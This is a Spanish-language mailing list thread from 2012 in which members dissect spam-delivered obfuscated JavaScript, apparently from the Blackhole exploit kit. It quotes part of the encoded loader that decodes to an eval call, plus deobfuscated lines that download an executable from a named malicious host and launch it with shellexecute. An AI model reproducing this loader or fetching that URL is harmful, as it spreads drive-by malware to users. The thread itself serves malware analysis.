[uylug-varios] ataques curiosos
Sylvia
Mapalapa_Igu at yahoo.com.ar
Thu Oct 11 14:56:39 PDT 2012
Tengo curiosidad... ¿Para qué es que venden ese código? ¿y para qué lo
compran esas otras personas?
/Disculpen la ignorancia
*Sylvia*
/
El 10/10/12 23:38, Pedro Worcel escribió:
> Copiando el codigo y pegandolo en google, parece que se trata de un
> blackhole exploit kit!
>
> https://www.google.co.nz/search?q=pdfver+%3D+pdfver.split%28%27.%27%29&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-nightly
>
> Aca hay un pdf
> <http://www.google.co.nz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDYQFjAD&url=http%3A%2F%2Fwww.sophos.com%2Fen-us%2Fmedialibrary%2FPDFs%2Ftechnical%2520papers%2Fsophosblackholeexploitkit.pdf%3Fdl%3Dtrue&ei=xiB2UOyNKeW0iQfOroGYBg&usg=AFQjCNGhR2wjkJTPWwAG5qrcMSJLxsqa0Q&cad=rja>
> respecto al tema, que no puedo leer porque se supone estoy trabajando
> :P Hay unos chabones que los crean, y despues la gente compra el
> software y lo distribuye por sus propios medios.
>
>
> ¡pah! qué socotroco de código. La mayor parte parece tener que ver
> con verificar la presencia de algún plugin del navegador. Pero al
> final baja algo e intenta ejecutarlo en un shell:
>
> var ra4 = ".//..//757736c.exe"
> [...]
> ra2.open("GET",
> "http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"
> <http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz>,
> false);
> [...]
> with(ra1) {
> shellexecute(ra4);
> }
>
> ¿es posible hacer esto desde javascript? ¿bajar un ejecutable y
> ejecutarlo desde un shell?
>
> saludos
>
> Kenneth
>
>
> Estas personas -- locos de mierda -- parecen pensar que si:
>
> http://stackoverflow.com/questions/10186813/how-to-run-cmd-exe-with-parameters-from-javascript
> http://stackoverflow.com/questions/3152482/running-exe-from-javascript
>
> Es raro, porque shellexecute no esta definido en el codigo que estamos
> viendo, y los ejemplos en stack overflow estan en mayusculas. Quizas
> ese GET este agregando un elemento al DOM que contenga la funcion
> shellexecute?
>
> Un abrazo!
> Pedro
>
> El 11 de octubre de 2012 14:20, Carlos M. Martinez
> <carlosmarcelomartinez at gmail.com
> <mailto:carlosmarcelomartinez at gmail.com>> escribió:
>
> Hace otras cosas tambien, que aparentemente involucran ActiveX,
> pero no lo segui a fondo.
>
> Muy bueno lo de Pedro :-)
>
> ~C.
>
> On 10/10/12 9:07 PM, Kenneth Irving wrote:
>>
>> ¡pah! qué socotroco de código. La mayor parte parece tener que
>> ver con verificar la presencia de algún plugin del navegador.
>> Pero al final baja algo e intenta ejecutarlo en un shell:
>>
>> var ra4 = ".//..//757736c.exe"
>> [...]
>> ra2.open("GET",
>> "http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"
>> <http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz>,
>> false);
>> [...]
>> with(ra1) {
>> shellexecute(ra4);
>> }
>>
>> ¿es posible hacer esto desde javascript? ¿bajar un ejecutable y
>> ejecutarlo desde un shell?
>>
>> saludos
>>
>> Kenneth
>>
>> On Thu, 11 Oct 2012, Pedro Worcel wrote:
>>
>>> Hola gente!
>>>
>>> Aprovecho este post para presentarme, soy Pedro, estoy
>>> programando ahora en Nueva Zelanda pero me crie en Mercedes, y
>>> estudie en la
>>> UTU. Me paso mi viejo un link de esta conversacion me parecio
>>> interesante y ahora me anote para UYLUG. Tambien me anote un
>>> poco porque
>>> me impresiono que se vaya a organizar un evento a nivel
>>> Latinoamericano de la OWASP en Montevideo, muy groso.
>>>
>>> La verdad que no entiendo como codifica el malware el
>>> javascript, pero no hace falta saberlo porque al final el mismo
>>> lo decodifica y
>>> lo manda a un eval.
>>>
>>> Para poder trabajar con el lo descargue desde la linea de
>>> comandos y lo edite con vim. Reemplace todas las ocurrencias de
>>> eval por
>>> console.log y luego copie los contenidos de el firebug en el
>>> pastebin y lo hice mas lindo.
>>>
>>> El codigo del malware esta aca:
>>>
>>> http://pastie.org/5032658
>>>
>>> Y adjunto el malware, segun yo, neutralizado. (no garantizo nada
>>> eh)
>>>
>>> Saludos!
>>> Pedro
>>>
>>> ---------- Mensaje reenviado ----------
>>> De: Kenneth Irving <ken at fq.edu.uy> <mailto:ken at fq.edu.uy>
>>> Fecha: 10 de octubre de 2012 19:25
>>> Asunto: [uylug-varios] ataques curiosos
>>> Para: UYLUG <uylug-varios at uylug.org.uy>
>>> <mailto:uylug-varios at uylug.org.uy>
>>>
>>>
>>>
>>> Hace un tiempo que de tanto en tanto recibo spam que parece
>>> diverso (el último era un boletín de noticias trucho de CNN),
>>> pero que
>>> termina siempre en algo parecido. Son emails que siempre tienen
>>> algún link que te baja un HTML que contiene en su interior 3 o 4
>>> links
>>> que te bajan un código Javascript, que lo único que hace es
>>> bajar algún otro archivo, este sí un HTML que contiene el código
>>> malicioso
>>> en javascript.
>>>
>>> Paso el link final para bajar el código malicioso de javascript:
>>>
>>> http://2.cmisdfoundation.com/links/persons_jobs.php
>>>
>>> y trascribo sólo parte del código. El código comienza con esto:
>>>
>>> ------------------------- comienzo
>>> ---------------------------------
>>> <html><head><title></title></head><body><div
>>> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
>>> 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
>>>
>>> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
>>>
>>> c353e373k!381r311t31^"
>>> 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
>>>
>>> 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
>>> 49="42e3f34 at 353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
>>>
>>> 53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
>>>
>>> 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f&3i3s3s12
>>>
>>> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
>>>
>>> ------------------------ [código cortado]
>>> ---------------------------
>>>
>>> El bloque de datos codificados continúa, y el archivo termina
>>> con esto:
>>> ------------------------ [continuación]
>>> -----------------------------
>>> 65="53i)23313j3518#191e3i353g*3c31333518
>>> !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
>>>
>>>
>>> 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
>>>
>>> if(020==0x10)a=document.getElementsByTagName(dd)[1];
>>> s="";
>>> for(i=0;;i++){
>>> if(window.document)r=a.getAttribute(i);
>>> if(r){s=s+r;}else break;
>>> }
>>> a=s;
>>> asd();
>>> s="";
>>> for(i=0;i<a.length;i+=2){
>>> s+=String.fromCharCode(parseInt(a.substr(i,2),32));
>>> }
>>> c=s;
>>> e=eval;
>>> try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
>>> </script></body></html>
>>> -------------------- fin -------------------------------
>>>
>>> Esto lo paso sólo como muestra y para no publicar el socotroco
>>> completo. Es más práctico simplemente bajarlo desde el link
>>> original.
>>>
>>> Es obvio que el bloque de datos codificados e decodificado en el
>>> código javascript final, y luego de decodificarlo se ejecuta con el
>>> "e(c)".
>>>
>>> Imagino que debe tratarse de código javascript ofuscado para
>>> explotar alguna debilidad de algún navegador o algún cliente de
>>> email,
>>> pero mis pobres conocimientos de javascript no me han permitido
>>> decodificar esto sin riesgo, por lo que lo publico en esta
>>> lista, tal
>>> vez alguien con suficiente curiosidad pueda decodificarlo y
>>> hacernos saber de qué se trata. Es simplemente curiosidad, me
>>> resultó muy
>>> interesante el trabajo que se toman para ocultar el código
>>> malicioso.
>>>
>>> saludos
>>>
>>> Kenneth
>>> _______________________________________________
>>> Uylug-varios mailing list
>>> Uylug-varios at listas.uylug.org.uy
>>> <mailto:Uylug-varios at listas.uylug.org.uy>
>>> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>>>
>>>
>>> --
>>> http://is.gd/droope
>>>
>>>
>>
>>
>> _______________________________________________
>> Uylug-varios mailing list
>> Uylug-varios at listas.uylug.org.uy <mailto:Uylug-varios at listas.uylug.org.uy>
>> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>>
>>
>> _______________________________________________
>> Uylug-varios mailing list
>> Uylug-varios at listas.uylug.org.uy <mailto:Uylug-varios at listas.uylug.org.uy>
>> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> <mailto:Uylug-varios at listas.uylug.org.uy>
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
>
>
> --
> http://is.gd/droope <http://is.gd/signature_>
>
>
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121011/3c84c4ee/attachment-0002.htm>
More information about the Uylug-varios
mailing list